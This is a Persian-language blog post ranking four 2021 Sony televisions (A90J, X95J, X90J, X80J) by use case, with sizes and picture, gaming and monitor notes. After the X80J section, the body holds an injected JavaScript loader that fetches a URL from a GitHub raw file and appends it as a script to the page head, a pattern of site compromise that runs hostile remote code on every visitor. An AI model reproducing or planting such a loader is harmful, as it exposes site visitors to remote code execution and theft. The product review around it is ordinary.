دسته‌بندی نشده

4 تلویزیون برتر سونی در سال 2021

تلویزیون های سونی عموما از کیفیت تصویر بالا و ویژگی های تصویری پیشرفته ای برخوردار هستند. این تلویزیون های با دقت رنگی بالا و ویژگی های مناسب دیگری عرضه می شوند. کیفیت و نحو ساخت تلویزین های این برند معمولا از حد وسط بیشتر است. مدل های بالا رده سونی رقابت زیادی با برند های دیگر از نظر پیشرفت و تکنولوژی دارند. در ادامه به بررسی 4 تلویزیون برتر این کمپانی در رده و کتگوری های مختلف می پردازیم. 

بهترین تلویزیون اسمارت smart سونی
A90J OLED

سایز ها : 55,65,83
تلویزیون اولد سونی مدل A90J بهترین انتخاب برای تماشا فیلم است. این تلویزیون به عنوان یک محصول ممتاز در سری OLED سال 2021 از سونی شناخته می شود و در بالای مدل A80J اولد از همین برند قرار می گیرد. در این تلویزیون به دلیل خاموش شدن مستقل پیکسل ها کیفیت تصویر فوق العاده بالایی برای تصاویر ایجاد می شود و رنگ های مشکی بی نظیری را روی نمایشگر ایجاد می کند. از انجا که هر پیکسل به صورت مستقل در تمام زوایا نور منتشر می کند زاویه دید گسترده برای این مدل ایجاد خواهد شد و تصاویر در قسمت های حاشیه ای کیفیت خود را حفظ خواهند کرد. در A90J رنگ ها فوق العاده دقیق و واضح هستند و همچنین تصاویر کم کیفیت به خوبی ارتقا داده می شود. از نظر گیمینگ این تلویزیون در حد متوسطی قرار دارد و نمی توان گفت بهترین گزینه برای انجام بازی می باشد چراکه در ان قابلیت های گیمینگ مانند نرخ رفرش متغیر VRR و یک سری از قابلیت های مخصوص گیم پشتیبانی نمی شود و تنها دارای پاسخگویی متوسط و تاخیر ورودی پایین است. مانند دیگر تلویزیون های OLED این تلویزیون سونی نیز در محتویات SDR می تواند سطح روشنایی خوبی ایجاد کند اما در نمایش محتوا HDR از نظر روشنایی ضعیف می باشد. 

بهترین تلویزیون سونی برای تماشا شو و برنامه ها
X95J  

سایز ها : 65,75,85
تلویزیون X9500J سونی را می توان به عنوان بهترین تلویزیون از این برند برای تماشا شو های تلویزیون در اتاق های روشن انتخاب کرد. برتری تلویزیون های LED نسبت به اولد روشنایی فوق العاده ان ها و کنترل انعکاس خوب ان ها می باشد که ترکیب این دو ویژگی به تماشا محتوا مختلف در اتاق ها روشن بدون هیچگونه مشکلی کمک می کند. یک برتری دیگر این پنل ها عدم سوختگی پیکسل ان ها در مدت زمان می باشد. در این تلویزیون هیچ مشکلی در ارتقا رزولوشن پایین وجود ندارد بنابراین انتخابی مناسب برای تماشا شو های مختلف تلویزیونی از طریق کابل و اپلیکیشن های مختلف است. با وجود استفاده از پنل VA و به دلیل بکار بردن تکنولوژی اختصاصی سونی X-Wide Angle زاویه دید در این تلویزیون کاملا  مناسب می باشد. البته این تکنولوژی بر روی نسبت کنتراست تلویزیون تاثیر گذاشته است  و ان را پایین اورده است. محتوا HDR به دلیل سطح وسیع روشنایی تلویزیون به خوبی روی نمایشگر ارائه می شود. این تلویزیون مانند دیگر تلویزیون های سونی از قابلیت VRR پشتیبانی نمی کند اما دارای ورودی HDMI 2.1 و پنل 120 هرتز می باشد. X95J  بهترین تلویزیون سونی برای تماشا شو های تلویزیونی در اتاق های روشن می باشد. 

بهترین تلویزیون سونی برای گیمینگ
X90J

سایز ها : 50,55,65,75
تلویزیون X9000J سونی بهترین تلویزیون این برند برای انجام بازی و گیمینگ می باشد. از نظر ویژگی و عملکرد این تلویزیون به مدل X95J بسیار نزدیک است اما برای استفاده در اتاق های تاریک به دلیل عدم بهرمندی از تکنولوژی زاویه دید و نمایش عمیق تر رنگ های مشکی بهتر می باشد. این تلویزیون دارای عملکرد گیمینگ فوق العاده ای است و دارای قابلیت HDMI 2.1 است که برای اجرا بازی های فورکی بالای 120 fps کنسول های بازی بسیار کاربردی می باشد. X90J در اجرا بازی های HDR دارای عملکردی عالی است و تجربه عالی را برای گیمر ها ایجاد می کند. در کل این تلویزیون می تواند بسیاری از گیمر ها را راضی و خشنود نگه دارد. 

بهترین تلویزیون سونی برای استفاده به عنوان مانیتور
X80J

سایز ها : 43,50,55,65,75
اگر به دنبال یک تلویزیون هستید که بتوانید از ان به عنوان مانیتور در کامپیوتر ها استفاده کنید مدل X8000J از سونی انتخابی عالی می باشد. این مدل از تولیدات 2021 در سری تلویزیون های میان رده است. این تلویزیون دارای زاویه دید گسترده است بنابراین تصاویر در قسمت های حاشیه ای کیفیت و وضوح خود را حفظ خواهند کرد. در سیگنال های 60 هرتز از کیفیت 4K فورکی و 1080p این تلویزیون می تواند chroma 4:4:4 را کاملا واضح نمایش دهد که فوق العاده مهم برای خواندن متن های مختلف می باشد. در این تلویزیون تاخیر ورودی پایینی برای پاسخگویی به دسکتاپ ارائه می شود. 
(var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *